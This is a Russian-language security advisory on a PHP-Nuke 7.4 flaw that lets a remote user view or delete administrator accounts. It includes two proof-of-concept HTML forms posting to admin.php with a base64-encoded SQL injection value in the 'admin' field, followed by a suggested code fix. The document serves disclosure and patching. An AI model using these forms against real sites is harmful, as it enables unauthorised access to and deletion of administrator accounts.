Дата публикации: | 06.09.2004 |
Всего просмотров: | 2239 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: PHP-Nuke 7.4
Описание: Две уязвимости обнаружены в PHP-Nuke в обработке некоторых административных команд. Удаленный пользователь может просматривать информацию административной учетной записи и удалять административную учетную запись. Удаленный пользователь может представить специально обработанный POST запрос, чтобы просматривать ‘’aid’ значение административной учетной записи. Пример: <form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php"> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="mod_authors"> <input type="submit" name="Submit" value="Display"> <br> </p> </form>Также удаленный пользователь может представить специально обработанный POST запрос, чтобы удалить административную учетную запись. Пример: <form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php"> USERNAME: <input type="text" name="del_aid"> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="deladminconf"> <input type="submit" name="Submit" value="Delete Admin"> <br> </p> </form> URL производителя: http://www.phpnuke.org/ Решение: Добавьте этот код в admin.php: if ( !empty($HTTP_GET_VARS['op']) ) { $op = $HTTP_GET_VARS['op']; } if ( !empty($HTTP_POST_VARS['op']) ) { $op = $HTTP_POST_VARS['op']; } |
|
Ссылки: | [XSS] PHP-Nuke 7.4 ViewAdmin Bug |